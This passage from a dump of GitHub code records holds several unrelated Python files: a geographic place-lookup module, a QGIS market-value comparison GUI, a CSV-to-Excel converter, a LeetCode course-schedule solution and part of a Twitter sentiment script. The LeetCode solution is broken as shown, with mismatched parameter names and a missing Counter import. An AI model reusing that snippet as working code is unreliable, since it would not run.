None\n cities = []\n regions = []\n # loop over all word elements\n places=self.normalizePlaces(places)\n for place in places:\n foundCountry = self.getCountry(place)\n if foundCountry is not None:\n country = foundCountry\n foundCities = self.cities_for_name(place)\n cities.extend(foundCities)\n foundRegions = self.regions_for_name(place)\n regions.extend(foundRegions)\n foundCity = self.disambiguate(country, regions, cities)\n return foundCity\n\n @staticmethod\n def isISO(s):\n '''\n check if the given string is an ISO code (ISO 3166-2 code)\n see https://www.wikidata.org/wiki/Property:P300\n\n Returns:\n bool: True if the string might be an ISO Code as per a regexp check\n '''\n m = re.search(r\"^([A-Z]{1,2}\\-)?[0-9A-Z]{1,3}$\", s)\n result = m is not None\n return result\n \n def disambiguate(self, country, regions, cities, byPopulation=True): \n '''\n try determining country, regions and city from the potential choices\n \n Args:\n country(Country): a matching country found\n regions(list): a list of matching Regions found\n cities(list): a list of matching cities found\n \n Return:\n City: the found city or None\n '''\n if self.debug:\n print(\"countries: %s \" % country)\n print(\"regions: %s\" % \"\\n\\t\".join(str(r) for r in regions))\n print(\"cities: %s\" % \"\\n\\t\".join(str(c) for c in cities))\n foundCity = None\n # is the city information unique?\n if len(cities) == 1:\n foundCity = cities[0]\n else: \n if len(cities) > 1:\n if country is not None:\n for city in cities:\n if self.debug:\n print(\"city %s: \" % (city))\n if city.country.iso == country.iso:\n foundCity = city\n break\n if foundCity is None and len(regions) > 0:\n for region in regions:\n for city in cities:\n if city.region.iso == region.iso and not city.region.name == city.name:\n foundCity = city\n break\n if foundCity is not None:\n break\n if 
foundCity is None and byPopulation:\n foundCity = max(cities, key=lambda city:0 if city.pop is None else city.pop)\n pass\n \n return foundCity \n \n def cities_for_name(self, cityName):\n '''\n find cities with the given cityName\n \n Args:\n cityName(string): the potential name of a city\n \n Returns:\n a list of city records\n '''\n cities = []\n cityRecords = self.places_by_name(cityName, \"name\")\n for cityRecord in cityRecords:\n cities.append(City.fromCityLookup(cityRecord))\n return cities\n\n def regions_for_name(self, region_name):\n '''\n get the regions for the given region_name (which might be an ISO code)\n \n Args:\n region_name(string): region name\n \n Returns:\n list: the list of cities for this region\n '''\n regions = [] \n if self.isISO(region_name):\n columnName = \"iso\"\n else:\n columnName = 'name'\n query = f\"SELECT * from regions WHERE {columnName} = (?)\" \n params = (region_name,)\n regionRecords = self.sqlDB.query(query, params)\n for regionRecord in regionRecords:\n regions.append(Region.fromRecord(regionRecord))\n return regions \n \n def correct_country_misspelling(self, name):\n '''\n correct potential misspellings \n Args:\n name(string): the name of the country potentially misspelled\n Return:\n string: correct name of unchanged\n '''\n cur_dir = os.path.dirname(os.path.realpath(__file__))\n with open(cur_dir + \"/data/ISO3166ErrorDictionary.csv\") as info:\n reader = csv.reader(info)\n for row in reader:\n if name == remove_non_ascii(row[0]):\n return row[2]\n return name\n\n def is_a_country(self, name):\n '''\n check if the given string name is a country\n \n Args:\n name(string): the string to check\n Returns:\n True: if pycountry thinks the string is a country\n '''\n country = self.getCountry(name)\n result = country is not None\n return result\n \n def getCountry(self, name):\n '''\n get the country for the given name \n Args:\n name(string): the name of the country to lookup\n Returns: \n country: the country if one was found or None if not\n '''\n if self.isISO(name):\n query=\"SELECT * FROM countries WHERE iso = (?)\"\"\"\n params=(name,)\n else:\n if self.correctMisspelling:\n name = self.correct_country_misspelling(name)\n query=\"\"\"SELECT * FROM countries \nWHERE name LIKE (?)\nOR wikidataid in (SELECT wikidataid FROM country_labels WHERE label LIKE (?))\"\"\"\n params=(name,name,)\n country = None\n self.populate_db()\n countryRecords=self.sqlDB.query(query,params)\n if len(countryRecords)==1:\n country=Country.fromRecord(countryRecords[0])\n pass\n return country\n \n def getView(self):\n '''\n get the view to be used\n \n Returns:\n str: the SQL view to be used for CityLookups e.g. CityLookup\n '''\n view = self.view\n return view\n \n def places_by_name(self, placeName, columnName):\n '''\n get places by name and column\n Args:\n placeName(string): the name of the place\n columnName(string): the column to look at\n '''\n if not self.db_has_data():\n self.populate_db()\n view = self.getView()\n query = f'SELECT * FROM {view} WHERE {columnName} = (?) ORDER BY pop DESC'\n params = (placeName,)\n cityLookupRecords = self.sqlDB.query(query, params)\n cityLookupRecords.sort(key=lambda cityRecord: float(cityRecord.get('pop')) if cityRecord.get('pop') is not None else 0.0,reverse=True)\n return cityLookupRecords\n \n \n def recreateDatabase(self):\n '''\n recreate my lookup database\n '''\n print(f\"recreating database ... 
{self.db_file}\")\n self.populate_db(force=True)\n \n \n def populate_db(self, force=False):\n '''\n populate the cities SQL database which caches the information from the GeoLite2-City-Locations.csv file\n \n Args:\n force(bool): if True force a recreation of the database\n '''\n hasData = self.db_has_data()\n if force:\n self.populate_Countries(self.sqlDB)\n self.populate_Regions(self.sqlDB)\n self.populate_Cities(self.sqlDB)\n self.createViews(self.sqlDB)\n self.populate_Version(self.sqlDB)\n \n elif not hasData:\n self.downloadDB()\n if not os.path.isfile(self.db_file):\n raise(f\"could not create lookup database {self.db_file}\")\n \n def downloadDB(self, forceUpdate:bool=False):\n '''\n download my database\n\n Args:\n forceUpdate(bool): force the overwriting of the existent file\n '''\n if Download.needsDownload(self.db_file) or forceUpdate:\n LocationManager.downloadBackupFileFromGitHub(fileName=LocationContext.db_filename,\n targetDirectory=self.storageConfig.getCachePath(),\n force=forceUpdate)\n self.loadDB()\n \n \n def populate_Version(self, sqlDB):\n '''\n populate the version table\n \n Args:\n sqlDB(SQLDB): target SQL database\n '''\n versionList = [{\"version\":self.dbVersion}]\n entityInfo = sqlDB.createTable(versionList, \"Version\", \"version\", withDrop=True)\n sqlDB.store(versionList, entityInfo)\n \n def readCSV(self, fileName:str):\n '''\n read the given CSV file\n \n Args:\n fileName(str): the filename to read\n \n '''\n records = []\n cur_dir = os.path.dirname(os.path.realpath(__file__))\n csvfile = f\"{cur_dir}/data/{fileName}\" \n with open(csvfile) as info:\n reader = csv.DictReader(info)\n for row in reader:\n records.append(row)\n return records\n \n def getAliases(self):\n '''\n get the aliases hashTable\n '''\n aliases = self.readCSV(\"aliases.csv\")\n self.aliases = {}\n for alias in aliases:\n self.aliases[alias['name']] = alias['alias']\n \n \n def populate_Countries(self, sqlDB):\n '''\n populate database with countries from wikiData\n \n Args:\n sqlDB(SQLDB): target SQL database\n '''\n wikidata = Wikidata()\n countryList=wikidata.getCountries()\n wikidata.store2DB(countryList, \"countries\",primaryKey=None,sqlDB=sqlDB)\n \n def populate_Regions(self, sqlDB):\n '''\n populate database with regions from wikiData\n \n Args:\n sqlDB(SQLDB): target SQL database\n '''\n wikidata = Wikidata()\n regionList=wikidata.getRegions()\n wikidata.store2DB(regionList, \"regions\", primaryKey=None, sqlDB=sqlDB)\n \n def populate_Cities(self, sqlDB):\n '''\n populate the given sqlDB with the Wikidata Cities\n \n Args:\n sqlDB(SQLDB): target SQL database\n '''\n #wikidata = Wikidata()\n #wikidata.endpoint=\"https://confident.dbis.rwth-aachen.de/jena/wdhs/sparql\"\n #cityList=wikidata.getCities()\n #wikidata.store2DB(cityList, \"cities\",primaryKey=None,sqlDB=sqlDB)\n config=LocationContext.getDefaultConfig()\n regionManager = RegionManager(config=config)\n regionManager.fromCache()\n regionByIso,_dup=regionManager.getLookup(\"iso\")\n jsonFiles=CityManager.getJsonFiles(config)\n msg=f\"reading {len(jsonFiles)} cached city by region JSON cache files\"\n profiler=Profiler(msg)\n cityManager=CityManager(config=config)\n cityManager.getList().clear()\n for jsonFileName in jsonFiles:\n isoMatch = re.search(r\"/([^\\/]*)\\.json\", jsonFileName)\n if not isoMatch:\n print(f\"{jsonFileName} - does not match a known region's ISO code\")\n else:\n rIso=isoMatch.group(1)\n region=regionByIso[rIso]\n with open(jsonFileName) as jsonFile:\n cities4Region = json.load(jsonFile)\n for 
city4Region in cities4Region:\n city=City()\n city.fromDict(city4Region)\n if hasattr(city, \"regionId\"):\n city.partOfRegionId=city.regionId\n city.regionId=region.wikidataid\n cityManager.add(city)\n pass\n cityManager.store()\n profiler.time()\n \n def createViews(self, sqlDB):\n viewDDLs = [\"DROP VIEW IF EXISTS CityLookup\", \"\"\"\nCREATE VIEW CityLookup AS\nSELECT \n cl.label,\n ci.*,\n r.name as regionName ,r.iso as regionIso ,r.pop as regionPop,r.lat as regionLat, r.lon as regionLon,\n c.name as countryName,c.iso as countryIso,c.lat as CountryLat, c.lon as CountryLon\nFROM \ncity_labels cl\nJOIN cities ci on ci.wikidataid=cl.wikidataid\nJOIN regions r on ci.regionId=r.wikidataid\nJOIN countries c on ci.countryId=c.wikidataid\n\"\"\",\"DROP VIEW IF EXISTS RegionLookup\",\n\"\"\"CREATE VIEW RegionLookup AS\nSELECT \n rl.label,\n r.*,\n c.name as countryName,c.iso as countryIso,c.lat as CountryLat, c.lon as CountryLon\nFROM \nregion_labels rl\nJOIN regions r on rl.wikidataid=r.wikidataid\nJOIN countries c on r.countryId=c.wikidataid\n\"\"\",\"DROP VIEW IF EXISTS CountryLookup\",\n\"\"\"CREATE VIEW CountryLookup AS\nSELECT \n cl.label,\n c.*\nFROM \ncountry_labels cl\nJOIN countries c on cl.wikidataid=c.wikidataid\n\"\"\",\n\"DROP INDEX if EXISTS cityLabelByWikidataid\",\n\"CREATE INDEX cityLabelByWikidataid ON city_labels (wikidataid)\",\n\"DROP INDEX if EXISTS cityByWikidataid\",\n\"CREATE INDEX cityByWikidataid ON cities (wikidataid)\",\n\"DROP INDEX IF EXISTS cityByRegion\",\n\"CREATE INDEX cityByRegion ON cities (regionId)\",\n\"DROP INDEX IF EXISTS regionByCountry\",\n\"CREATE INDEX regionByCountry ON regions (countryId)\"]\n for viewDDL in viewDDLs:\n sqlDB.execute(viewDDL)\n \n def db_recordCount(self, tableList, tableName):\n '''\n count the number of records for the given tableName\n \n Args:\n tableList(list): the list of table to check\n tableName(str): the name of the table to check\n \n Returns\n int: the number of records found for the table \n '''\n tableFound = False\n for table in tableList:\n if table['name'] == tableName:\n tableFound = True\n break\n count = 0\n if tableFound: \n query = \"SELECT Count(*) AS count FROM %s\" % tableName\n countResult = self.sqlDB.query(query)\n count = countResult[0]['count']\n return count\n \n def db_has_data(self):\n '''\n check whether the database has data / is populated\n \n Returns:\n boolean: True if the cities table exists and has more than one record\n '''\n tableList = self.sqlDB.getTableList()\n hasCities = self.db_recordCount(tableList,\"cities\")>200000\n hasCountries = self.db_recordCount(tableList, \"countries\") > 200\n hasRegions = self.db_recordCount(tableList, \"regions\") > 3000\n hasVersion = self.db_recordCount(tableList, \"Version\") == 1\n versionOk = False\n if hasVersion:\n query = \"SELECT version from Version\"\n dbVersionList = self.sqlDB.query(query)\n versionOk = dbVersionList[0]['version'] == self.dbVersion\n # hasWikidataCities=self.db_recordCount(tableList,'City_wikidata')>100000\n ok = hasVersion and versionOk and hasCities and hasRegions and hasCountries\n return ok\n\n def loadDB(self):\n '''\n loads the database from cache and sets it as sqlDB property\n '''\n self.sqlDB = SQLDB(self.db_file, errorDebug=True)\n\n \n__version__ = '0.2.2'\n__date__ = '2020-09-26'\n__updated__ = '2021-11-29'\n\nDEBUG = 1\n\n \ndef main(argv=None): # IGNORE:C0111\n '''main program.'''\n\n if argv is None:\n argv = sys.argv\n else:\n sys.argv.extend(argv) \n \n program_name = os.path.basename(sys.argv[0])\n 
program_version = \"v%s\" % __version__\n program_build_date = str(__updated__)\n program_version_message = '%%(prog)s %s (%s)' % (program_version, program_build_date)\n program_shortdesc = __import__('__main__').__doc__.split(\"\\n\")[1]\n user_name = \"Wolfgang Fahl\"\n program_license = '''%s\n\n Created by %s on %s.\n Copyright 2020-2021 Wolfgang Fahl. All rights reserved.\n\n Licensed under the Apache License 2.0\n http://www.apache.org/licenses/LICENSE-2.0\n\n Distributed on an \"AS IS\" basis without warranties\n or conditions of any kind, either express or implied.\n\nUSAGE\n''' % (program_shortdesc, user_name, str(__date__))\n\n try:\n # Setup argument parser\n parser = ArgumentParser(description=program_license, formatter_class=RawDescriptionHelpFormatter)\n parser.add_argument(\"-d\", \"--debug\", dest=\"debug\", action=\"store_true\", help=\"if True show debug information\")\n parser.add_argument(\"-cm\", \"--correctSpelling\", dest=\"correctMisspelling\", action=\"store_true\", help=\"if True correct typical misspellings\")\n parser.add_argument(\"-db\", \"--recreateDatabase\", dest='recreateDatabase', action=\"store_true\", help=\"recreate the database\")\n parser.add_argument('-V', '--version', action='version', version=program_version_message)\n\n # Process arguments\n args = parser.parse_args()\n loc = Locator.getInstance(correctMisspelling=args.correctMisspelling, debug=args.debug)\n if args.recreateDatabase:\n loc.recreateDatabase()\n else:\n print (\"no other functionality yet ...\")\n \n except KeyboardInterrupt:\n ### handle keyboard interrupt ###\n return 1\n except Exception as e:\n if DEBUG:\n raise(e)\n indent = len(program_name) * \" \"\n sys.stderr.write(program_name + \": \" + repr(e) + \"\\n\")\n sys.stderr.write(indent + \" for help use --help\")\n return 2 \n\n \nif __name__ == \"__main__\":\n if DEBUG:\n sys.argv.append(\"-d\")\n sys.exit(main()) \n","repo_name":"somnathrakshit/geograpy3","sub_path":"geograpy/locator.py","file_name":"locator.py","file_ext":"py","file_size_in_byte":53378,"program_lang":"python","lang":"en","doc_type":"code","stars":102,"dataset":"github-code","pt":"3"} +{"seq_id":"35311200334","text":"# George Adams\n# October 6, 2022\n# Main code for processing market value data\n\nimport os, sys\nimport qgis\nimport qgis.core\n\nfrom PyQt5.QtWidgets import QApplication, QMainWindow, QStyle, QFileDialog, QDialog, QMessageBox, QSizePolicy\nfrom PyQt5.QtGui import QStandardItemModel, QStandardItem, QDoubleValidator, QIntValidator\nfrom PyQt5.QtCore import QVariant\nfrom PyQt5.Qt import Qt\n\nimport overlay\nimport utilities\nimport main_gui\n\n\n# ==========================================\n# create app and main window\n# =========================================\n\n\n\nqgis_prefix = os.getenv(\"QGIS_PREFIX_PATH\")\nqgis.core.QgsApplication.setPrefixPath(qgis_prefix, True)\nqgs = qgis.core.QgsApplication([], False)\nqgs.initQgis()\n\napp = QApplication(sys.argv)\n# set up main window\nmainWindow = QMainWindow()\nui = main_gui.Ui_MainWindow()\nui.setupUi(mainWindow)\n\nlayer_base = None\nlayer_comparison = None\nlayer_overlay = None\nlayer_result_file = None\nlayer_overlay_result_file = None\n\n# =======================================\n# GUI event handler and related functions\n# =======================================\n\ndef selectBaseShapefile():\n global layer_base\n \"\"\"open file dialog to select exising shapefile and if accepted, update GUI accordingly\"\"\"\n select_file, _ = QFileDialog.getOpenFileName(mainWindow, \"Select 
shapefile\", \"\", \"Shapefile (*.shp)\")\n if select_file:\n ui.baseLE.setText(select_file)\n layer_base = qgis.core.QgsVectorLayer(select_file)\n updateBaseCB()\n updateBaseParamCB()\n\ndef selectComparisonShapefile():\n global layer_comparison\n \"\"\"open file dialog to select exising shapefile and if accepted, update GUI accordingly\"\"\"\n select_file, _ = QFileDialog.getOpenFileName(mainWindow, \"Select shapefile\", \"\", \"Shapefile (*.shp)\")\n if select_file:\n ui.comparisonLE.setText(select_file)\n layer_comparison = qgis.core.QgsVectorLayer(select_file)\n updateComparisonCB()\n updateComparisonParamCB()\n\ndef selectOverlayShapefile():\n global layer_overlay\n \"\"\"open file dialog to select exising shapefile and if accepted, update GUI accordingly\"\"\"\n select_file, _ = QFileDialog.getOpenFileName(mainWindow, \"Select shapefile\", \"\", \"Shapefile (*.shp)\")\n if select_file:\n ui.overlayLE.setText(select_file)\n layer_overlay = qgis.core.QgsVectorLayer(select_file)\n #==>updateOverlayCB()\n\ndef selectNewResultGPKGfile():\n global layer_result_file\n \"\"\"open file dialog to creaete new shapefile and if accepted, update GUI accordingly\"\"\"\n new_file, _ = QFileDialog.getSaveFileName(mainWindow,\"Save new GeoPackage as\", \"\",\" (*.gpkg)\")\n if new_file:\n ui.resultLE.setText(new_file)\n layer_result_file = new_file\n\n\ndef selectNewOverlayResultGPKGfile():\n global layer_overlay_result_file\n \"\"\"open file dialog to creaete new shapefile and if accepted, update GUI accordingly\"\"\"\n new_file, _ = QFileDialog.getSaveFileName(mainWindow,\"Save new GeoPackage as\", \"\",\" (*.gpkg)\")\n if new_file:\n ui.resultOverlayLE.setText(new_file)\n layer_overlay_result_file = new_file\n\ndef resultToggle():\n if ui.resultCkB.isChecked():\n ui.resultLE.setEnabled(True)\n ui.resultTB.setEnabled(True)\n else:\n ui.resultLE.setEnabled(False)\n ui.resultTB.setEnabled(False)\n\ndef resultOverlayToggle():\n if ui.resultOverlayCkB.isChecked():\n ui.resultOverlayLE.setEnabled(True)\n ui.resultOverlayTB.setEnabled(True)\n else:\n ui.resultOverlayLE.setEnabled(False)\n ui.resultOverlayTB.setEnabled(False)\n\ndef updateBaseParamCB():\n global layer_base\n # Update base combobox after base shapefile is selected\n ui.baseParamCB.clear()\n\n try:\n ui.baseParamCB.addItems(utilities.getNumericFields(layer_base))\n except Exception as e:\n QMessageBox.information(mainWindow, 'Operation failed - Update Base Parameter ComboBox',\n 'Obtaining parameter list failed with ' + str(e.__class__) + ': ' + str(e), QMessageBox.Ok)\n ui.statusbar.clearMessage()\n\ndef updateBaseCB():\n global layer_base\n # Update base combobox after base shapefile is selected\n ui.baseCB.clear()\n\n try:\n ui.baseCB.addItems(utilities.getAllFields(layer_base))\n except Exception as e:\n QMessageBox.information(mainWindow, 'Operation failed - Update Base Unique ID ComboBox',\n 'Obtaining field list failed with ' + str(e.__class__) + ': ' + str(e), QMessageBox.Ok)\n ui.statusbar.clearMessage()\n\n\ndef updateComparisonParamCB():\n global layer_comparison\n # Update base combobox after base shapefile is selected\n ui.comparisonParamCB.clear()\n\n try:\n ui.comparisonParamCB.addItems(utilities.getNumericFields(layer_base))\n except Exception as e:\n QMessageBox.information(mainWindow, 'Operation failed - Update Comparison Parameter ComboBox',\n 'Obtaining parameter list failed with ' + str(e.__class__) + ': ' + str(e), QMessageBox.Ok)\n ui.statusbar.clearMessage()\n\ndef updateComparisonCB():\n global layer_comparison\n # 
Update comparison combobox after base shapefile is selected\n ui.comparisonCB.clear()\n\n try:\n ui.comparisonCB.addItems(utilities.getAllFields(layer_base))\n except Exception as e:\n QMessageBox.information(mainWindow, 'Operation failed - Update Comparison Unique ID ComboBox',\n 'Obtaining field list failed with ' + str(e.__class__) + ': ' + str(e), QMessageBox.Ok)\n ui.statusbar.clearMessage()\n\n\n\ndef processData():\n ui.statusbar.showMessage('Processing has started... please wait!')\n dict_base = {}\n dict_comparison = {}\n dict_overlay = {}\n global layer_base\n global layer_comparison\n global layer_overlay\n global layer_result_file\n global layer_overlay_result_file\n\n if layer_base is None:\n ui.statusbar.showMessage('Exiting... select the base layer')\n return\n if layer_comparison is None:\n ui.statusbar.showMessage('Exiting... select the comparison layer')\n return\n if layer_overlay is None:\n ui.statusbar.showMessage('Exiting... select the overlay layer')\n return\n if ui.resultCkB.isChecked():\n if layer_result_file is None:\n ui.statusbar.showMessage('Exiting... select the layer result file')\n return\n if ui.resultOverlayCkB.isChecked():\n if layer_overlay_result_file is None:\n ui.statusbar.showMessage('Exiting... select the overlay layer result file')\n return\n\n #layer_base = qgis.core.QgsVectorLayer(\n # r'C:\\PENN_STATE\\GEOG489\\FINAL_PROJECT\\Datasets\\Hondo_Parcels_2019_Dissolve_4326.shp')\n\n #layer_comparison = qgis.core.QgsVectorLayer(\n # r'C:\\PENN_STATE\\GEOG489\\FINAL_PROJECT\\Datasets\\Hondo_Parcels_2022_Dissolve_4326.shp')\n #layer_overlay = qgis.core.QgsVectorLayer(r'C:\\PENN_STATE\\GEOG489\\FINAL_PROJECT\\Datasets\\zoning_4326.shp')\n #layer_result_file = r'C:\\PENN_STATE\\GEOG489\\FINAL_PROJECT\\Results\\market_value.gpkg'\n\n if ui.resultCkB.isChecked():\n layer_result = qgis.core.QgsVectorLayer('Polygon?crs=' + layer_comparison.crs().authid() +\n '&field='+ ui.comparisonCB.currentText()+':string(25)&field=OWNER_NAME:string(70)&field=PCT_CHANGE:double' \\\n '&field=BASE_VALUE:double&field=NEW_VALUE:double',\n 'results', 'memory')\n\n #layer_overlay_result_file = r'C:\\PENN_STATE\\GEOG489\\FINAL_PROJECT\\Results\\overlay_result.gpkg'\n\n if ui.resultOverlayCkB.isChecked():\n layer_overlay_result = qgis.core.QgsVectorLayer('Polygon?crs=' + layer_overlay.crs().authid() +\n '&field=ID:string(25)' \\\n '&field=DESC:string(80)' \\\n '&field=AVERAGE:double' \\\n '&field=MEDIAN:double',\n 'overlay_results', 'memory')\n\n for field in layer_base.fields():\n print(field.name())\n print(field.typeName())\n print(field.length())\n print(field.isNumeric())\n print('----------')\n\n for feature in layer_base.getFeatures():\n dict_base[str(feature[ui.baseCB.currentText()])] = feature\n\n print('Dictionary base length ' + str(len(dict_base)))\n\n print('')\n print('++++++++++++++')\n for field in layer_overlay.fields():\n print(field.name())\n print(field.typeName())\n print(field.length())\n print(field.isNumeric())\n print('----------')\n\n\n for feature in layer_comparison.getFeatures():\n dict_comparison[str(feature[ui.comparisonCB.currentText()])] = feature\n\n\n for feature in layer_overlay.getFeatures():\n dict_overlay[str(feature['gid'])] = overlay.Overlay(feature)\n\n\n\n\n\n # Find features in comparison layer that are in the base layer to evaluate the change in market value\n # As these feature are found create a new layer with the percentage change in market value.\n\n features_result = []\n\n for id_compare in dict_comparison:\n print(id_compare)\n 
#if id_compare == '1985':\n # print('Found 1985')\n feature_comparison = dict_comparison[id_compare]\n if feature_comparison[ui.comparisonParamCB.currentText()] > 0:\n\n if id_compare in dict_base:\n #print(id_base)\n feature_base = dict_base[id_compare]\n\n #print(feature_base[ui.baseParamCB.currentText()])\n if feature_base[ui.baseParamCB.currentText()] > 0:\n pct_change = 100 * (feature_comparison[ui.comparisonParamCB.currentText()] - feature_base[ui.baseParamCB.currentText()]) / feature_base[ui.baseParamCB.currentText()]\n feature_new = qgis.core.QgsFeature()\n feature_new.setAttributes([str(feature_comparison[ui.comparisonCB.currentText()]), feature_comparison['OWNER_NAME'],\n pct_change, feature_base[ui.baseParamCB.currentText()], feature_comparison[ui.comparisonParamCB.currentText()]])\n feature_new.setGeometry(feature_comparison.geometry())\n features_result.append(feature_new)\n\n element = overlay.OverlayElement(str(feature_comparison[ui.comparisonCB.currentText()]), feature_comparison.geometry(),\n feature_base[ui.baseParamCB.currentText()], feature_comparison[ui.comparisonParamCB.currentText()])\n for id_overlay in dict_overlay:\n if dict_overlay[id_overlay].feature.geometry().contains(feature_comparison.geometry().centroid()):\n dict_overlay[id_overlay].addElement(element)\n\n if ui.resultCkB.isChecked():\n resultProvider = layer_result.dataProvider()\n resultProvider.addFeatures(features_result)\n print(len(features_result))\n\n\n overlay_result = []\n num_elements = 0\n\n for id_overlay in dict_overlay:\n num_elements += (len(dict_overlay[id_overlay].elements))\n print('Number of elements in Overlay: ' + str(id_overlay) + ' : ' + str((len(dict_overlay[id_overlay].elements))))\n\n feature_overlay = qgis.core.QgsFeature()\n dict_overlay[id_overlay].calculateAverage()\n dict_overlay[id_overlay].calculateMedian()\n feature_overlay.setAttributes([str(id_overlay), str(dict_overlay[id_overlay].feature[\"layer\"]) +\n ': ' +\n str(dict_overlay[id_overlay].feature[\"label\"]),\n dict_overlay[id_overlay].average_change,\n dict_overlay[id_overlay].median_change])\n feature_overlay.setGeometry(dict_overlay[id_overlay].feature.geometry())\n overlay_result.append(feature_overlay)\n\n if ui.resultOverlayCkB.isChecked():\n overlayProvider = layer_overlay_result.dataProvider()\n overlayProvider.addFeatures(overlay_result)\n\n print('Total elements: ' + str(num_elements))\n if ui.resultCkB.isChecked():\n qgis.core.QgsVectorFileWriter.writeAsVectorFormat(layer_result, layer_result_file, \"utf-8\", layer_comparison.crs(), \"GPKG\")\n if ui.resultOverlayCkB.isChecked():\n qgis.core.QgsVectorFileWriter.writeAsVectorFormat(layer_overlay_result, layer_overlay_result_file, \"utf-8\", layer_overlay.crs(), \"GPKG\")\n\n\n# ==========================================\n# connect signals\n# ==========================================\nui.baseTB.clicked.connect(selectBaseShapefile)\nui.comparisonTB.clicked.connect(selectComparisonShapefile)\nui.overlayTB.clicked.connect(selectOverlayShapefile)\nui.resultTB.clicked.connect(selectNewResultGPKGfile)\nui.resultOverlayTB.clicked.connect(selectNewOverlayResultGPKGfile)\nui.runPB.clicked.connect(processData)\nui.resultCkB.clicked.connect(resultToggle)\nui.resultOverlayCkB.clicked.connect(resultOverlayToggle)\nui.baseLE.editingFinished.connect(updateBaseCB)\nui.baseLE.editingFinished.connect(updateBaseParamCB)\nui.comparisonLE.editingFinished.connect(updateComparisonCB)\nui.comparisonLE.editingFinished.connect(updateComparisonParamCB)\n\n# 
=======================================\n# run app\n# =======================================\nmainWindow.show()\n\nqgs.exitQgis()\nsys.exit(app.exec_())\n","repo_name":"gradams555/FINAL_PROJECT","sub_path":"Development/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":13626,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"25780645915","text":"import csv\nimport xlwt\n\n# csvReader读取文件\ndef csvRead(csvPath):\n csvFile = csv.reader(open(csvPath, 'r', encoding=\"utf8\"))\n return csvFile\n\n# csv写文件\ndef csvWrite(csvPath):\n csvFile = open(csvPath, 'w', encoding='utf8', newline='')\n writer = csv.writer(csvFile)\n return writer\n\n# csv转化为excel\ndef csv_to_xlsx(readPath,writePath):\n with open(readPath, 'r', encoding='utf-8') as f:\n read = csv.reader(f)\n workbook = xlwt.Workbook()\n sheet = workbook.add_sheet('data') # 创建一个sheet表格\n l = 0\n for line in read:\n r = 0\n for i in line:\n sheet.write(l, r, i) # 一个一个将单元格数据写入\n r = r + 1\n l = l + 1\n\n workbook.save(writePath) # 保存Excel\n\nreadPathList=['resultlabelB1','resultlabelB5','resultlabelB10','resultlabelF1','resultlabelF5','resultlabelF10']\nfor readPath in readPathList:\n rPath='../data/%s.csv'%readPath\n wPath='../data/%s.xls'%readPath\n csv_to_xlsx(rPath,wPath)","repo_name":"ZBayes/tool_lib","sub_path":"csv_tool.py","file_name":"csv_tool.py","file_ext":"py","file_size_in_byte":1051,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"8991766892","text":"# Author: RT\n# Date: 2023-07-13T23:10:11.531Z\n# URL: https://leetcode.com/problems/course-schedule/\n\n\nfrom collections import defaultdict\n\n\nclass Solution:\n def canfinish(self, numcourses: int, prerequisites: list[list[int]]) -> bool:\n radj = defaultdict(list)\n deps_count = Counter()\n # b is prerequisite of a\n for a, b in prerequisites:\n radj[b].append(a)\n deps_count[a] += 1\n\n can_take = []\n for course in range(numCourses):\n if not deps_count[course]:\n can_take.append(course)\n\n taken = 0\n while can_take:\n new_can_take = []\n\n for to_take in can_take:\n taken += 1\n for course in radj[to_take]:\n deps_count[course] -= 1\n if deps_count[course] == 0:\n new_can_take.append(course)\n\n can_take = new_can_take\n\n return taken == numCourses\n","repo_name":"Roytangrb/dsa","sub_path":"leetcode/python/207-course-schedule.py","file_name":"207-course-schedule.py","file_ext":"py","file_size_in_byte":974,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"3"} +{"seq_id":"2953997336","text":"# for tweet API\nimport pandas as pd\nimport time\nimport numpy as np\nimport os\nimport re\nimport contractions\nimport nltk\nimport tweepy \nimport seaborn as sns\nfrom datetime import date\nfrom nltk.stem.wordnet import WordNetLemmatizer\nfrom vaderSentiment.vaderSentiment import SentimentIntensityAnalyzer\nsentiment=SentimentIntensityAnalyzer()\nwords=set(nltk.corpus.words.words())\ndef get_api():\n consumer_key = os.environ['consumer_key']\n consumer_secret = os.environ['consumer_secret']\n access_key= os.environ['access_key']\n access_secret = os.environ['access_secret']\n auth = tweepy.OAuthHandler(consumer_key, consumer_secret)\n auth.set_access_token(access_key, access_secret)\n api = tweepy.API(auth,wait_on_rate_limit=True,wait_on_rate_limit_notify=True)\n return api\ndef clean_txt(input_txt, pattern):\n #removing hashtags,emojis,stopwords\n input_txt=re.sub(r'#[\\w]*','',input_txt)\n 
input_txt=input_txt.encode(\"ascii\",\"ignore\")\n input_txt=input_txt.decode()\n \n ##removing @user\n r = re.findall(pattern, input_txt)\n for i in r:\n input_txt = re.sub(i, '', input_txt)\n \n #removing stopwords \n input_txt = ' '.join([i for i in input_txt.split() if not i in words])\n #contractions\n input_txt=contractions.fix(input_txt)\n #removing punctuation,numbers and whitespace \n res=re.sub(r'[^\\w\\s]', '', input_txt.lower())\n res=re.sub('\\s+',' ',res)\n ##removing links\n res=re.sub(r'https[\\w]*', '', res, flags=re.MULTILINE)\n #removing acronyms\n res=''.join(i for i in res if not i.isdigit())\n res=' '.join([i for i in res.split() if len(i)>2])\n lem = WordNetLemmatizer()\n res = lem.lemmatize(res)\n \n return res\ndef get_sentiment(data):\n ss=[]\n for _,row in data.iterrows():\n sent_dict=sentiment.polarity_scores(row['Clean Tweets'])\n if(sent_dict['compound']>=0.05):\n ss.append(\"POSITIVE\")\n elif(sent_dict['compound']<=-0.05):\n ss.append(\"NEGATIVE\")\n else:\n ss.append(\"NEUTRAL\")\n return ss\ndef get_data(keyword,api):\n data={\"Date\":[],\"Tweet\":[],\"Tweet Source\":[],\"Retweets\":[],\"Likes\":[],\"Location\":[]}\n for tweet in tweepy.Cursor(api.search,q=keyword+\"-filter:retweets\",count=1000,lang=\"en\",until=date.today(),tweet_mode=\"extended\").items():\n if(len(data['Tweet'])<1000):\n #st.write(\"Tweets extracted\",len(data['Tweet']))\n data['Date'].append(tweet.created_at)\n data['Tweet'].append(tweet.full_text)\n data['Location'].append(tweet.user.location)\n data['Tweet Source'].append(tweet.source)\n data['Retweets'].append(tweet.retweet_count)\n data['Likes'].append(tweet.favorite_count)\n else:\n break\n data=pd.DataFrame.from_dict(data,orient=\"index\").transpose()\n data['Clean 